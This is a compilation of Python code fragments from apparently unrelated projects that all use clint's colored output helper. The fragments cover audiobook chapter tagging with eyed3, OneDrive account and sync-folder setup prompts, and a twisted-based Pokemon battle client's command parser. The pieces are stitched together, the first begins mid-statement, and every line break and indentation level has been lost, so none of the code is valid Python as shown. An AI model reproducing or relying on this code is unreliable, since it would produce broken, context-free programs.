}) toc = audiofile.tag.table_of_contents.set( 'toc'.encode('ascii'), toplevel=True, ordered=True, child_ids=[], description=u'Table of Contents') for i, m in enumerate(merged_markers): title_frameset = eyed3.id3.frames.FrameSet() title_frameset.setTextFrame(eyed3.id3.frames.TITLE_FID, u'{}'.format(m['text'])) chap = audiofile.tag.chapters.set(m['id'].encode('ascii'), times=(m['start_time'], m['end_time']), sub_frames=title_frameset) toc.child_ids.append(chap.element_id) logger.debug( u'Added chap tag => {}: {}-{} "{}" to "{}"'.format( colored.cyan(m['id']), m['start_time'], m['end_time'], colored.cyan(m['text']), colored.blue(book_filename))) audiofile.tag.save() for f in file_tracks: try: os.remove(f['file']) except Exception as e: logger.warning('Error deleting "{}": {}'.format( f['file'], str(e))) if not keep_cover: try: os.remove(cover_filename) except Exception as e: logger.warning('Error deleting "{}": {}'.format( cover_filename, str(e)))
def check_program_exists(program): if which(program) is None: exit( puts_err( colored.red("\n\t" + program + " not installed or on PATH.\n")))
try: if not os.path.exists(CONFIG_DIR): mkdir(CONFIG_DIR) print(colored.green('Created path "' + CONFIG_DIR + '".')) user_conf = get_current_user_config() network_monitor = netman.NetworkMonitor() personal_client = clients.PersonalClient(proxies=user_conf.proxies, net_monitor=network_monitor) business_client = None account_store = account_db.AccountStorage(CONFIG_DIR + '/accounts.db', personal_client=personal_client, business_client=business_client) drive_store = drives_db.DriveStorage(CONFIG_DIR + '/drives.db', account_store) except Exception as e: print(colored.red('Fatal error: ' + str(e))) sys.exit(1) def add_personal_account(): puts(colored.green('Link with an OneDrive Personal account:')) puts( colored.cyan( 'Please use your browser to visit the following URL, sign in with your OneDrive account and ' 'authorize onedrive-d, then copy the callback URL back here. The callback URL is the URL at ' 'which the authorization page goes blank and usually starts with ' + clients.PersonalClient.DEFAULT_REDIRECT_URI + '.')) puts() puts(colored.yellow('Please visit this URL: ')) puts(personal_client.get_auth_uri()) while True:
def banner(self): with indent(4, quote='>>>'): puts(colored.red(str(self.bannerdata())))
def error(err_string): puts(colored.red("ERROR: %s" % err_string))
def prompt_drive_config(drive): if hasattr(drive, 'config'): drive_config_data = drive.config.data else: drive_config_data = drive_config.DriveConfig.DEFAULT_VALUES if drive_config_data['local_root'] is None or drive_config_data[ 'local_root'] == '': drive_config_data[ 'local_root'] = OS_USER_HOME + '/OneDrive/' + drive.drive_id puts(colored.green('You selected Drive "%s"...' % drive.drive_id)) puts() with indent(4, quote=' >'): puts( 'When specifying local root, pick a directory not used by or under any other Drive.' ) puts( 'When specifying HTTPS download / upload sizes, note that files larger than those sizes will be handled ' 'as chunks.') puts() while True: local_root = prompt.query( 'Which local directory do you want to sync with this Drive?', default=drive_config_data['local_root']) try: if not os.path.exists(local_root): puts( colored.yellow( 'Directory "%s" does not exist. Try creating it...' % local_root)) mkdir(local_root) puts( colored.green('Successfully created directory "%s".' % local_root)) elif os.path.isfile(local_root): raise ValueError('Path "%s" is a file.' % local_root) if os.path.isdir(local_root): drive_config_data['local_root'] = local_root break raise ValueError('Invalid path "%s"' % local_root) except Exception as e: puts(colored.red('Error: ' + str(e))) drive_config_data['max_get_size_bytes'] = prompt.query( 'Maximum size, in KB, for a single download request?', default=str(drive_config_data['max_get_size_bytes'] >> 10), validators=[validators.IntegerValidator()]) * 1024 drive_config_data['max_put_size_bytes'] = prompt.query( 'Maximum size, in KB, for a single upload request?', default=str(drive_config_data['max_put_size_bytes'] >> 10), validators=[validators.IntegerValidator()]) * 1024 try: while not prompt.yn( 'Do you have ignore list files specific to this Drive to add?', default='n'): ignore_file_path = prompt.query( 'Path to the ignore list file (hit [Ctrl+C] to skip): ', validators=[validators.FileValidator()]) drive_config_data['ignore_files'].add(ignore_file_path) puts( colored.green('Recorded ignore list file: "{}"' % ignore_file_path)) except KeyboardInterrupt: pass drive_conf = drive_config.DriveConfig.load(drive_config_data) drive.config = drive_conf drive_store.add_record(drive)
def clientConnectionFailed(self, connector, reason): print(colored.red(reason.getErrorMessage())) from twisted.internet import reactor reactor.stop() # @UndefinedVariable
def show_invalid(valid_str): puts(colored.red(u"✗ %s" % valid_str))
def _updateOpp_name(self, name): self._opp_name = name self.out(colored.red(name) + colored.blue(" is your opponent\n"))
def userInputReceived(self, string): commands = { '?': self._printHelp, 'h': self._printHelp, 'help': self._printHelp, 'open': self._viewPlayerData, 'info': self._viewPokemon, 'add': self._addToBag, 'remove': self._removeFromBag, 'transfer': self._transferExp, 'view': self._viewBagContents, 'confirm': self._sendChosenPokemon, "attack": self._makeAttack, "pick": self._whenPokeFaints, "switch": self._makeSwitch, "surrender": self._makeSurrender, 'revive': self._revivePokemon, 'q': self._exitGame, 'quit': self._exitGame, 'exit': self._exitGame, } if string == '': # empty string return params = filter(len, string.split(' ', 1)) command, params = params[0], params[1:] # TODO: cleanup regex code below --> MESSY # check if match 'info' command r = re.compile('\s*info\s*([0-9]+)\s*') res = r.match(string) if res: command = 'info' params = res.groups() # check if match 'add' command r = re.compile('\s*add\s*([0-9]+)\s*') res = r.match(string) if res: command = 'add' params = res.groups() # check if match 'remove' command r = re.compile('\s*remove\s*([0-9]+)\s*') res = r.match(string) if res: command = 'remove' params = res.groups() # check if match 'switch' command r = re.compile('\s*switch\s*([0-9]+)\s*') res = r.match(string) if res: command = 'switch' params = res.groups() # check if match 'pick <id> attack' command r = re.compile('\s*pick\s*([0-9]+)\s*attack') res = r.match(string) if res: command = 'pick' params = res.groups() # check if match 'from <id> to <id>' command r = re.compile('\s*from\s*([0-9]+)\s*to\s*([0-9]+)\s*') res = r.match(string) if res: command = 'transfer' params = res.groups() # check if match 'revive' command r = re.compile('\s*revive\s*([0-9]+)\s*') res = r.match(string) if res: command = 'revive' params = res.groups() if not command: return if command not in commands: self.out(colored.red("Invalid command")) return try: commands[command](*params) except TypeError as e: self.out(colored.red("Invalid command parameters: {0}".format(e)))
def _battleInfo(self, yourPokeID, oppInfo): self._opp_pokemon = oppInfo self.out( colored.red(self._opp_name) + " sent out " + colored.blue(oppInfo['name']) + "; hp = " + str(oppInfo['hp']) + " ; level = " + str(oppInfo['level']))
def serverError(self, message): self.out(colored.red("Server error: {0}".format(message)))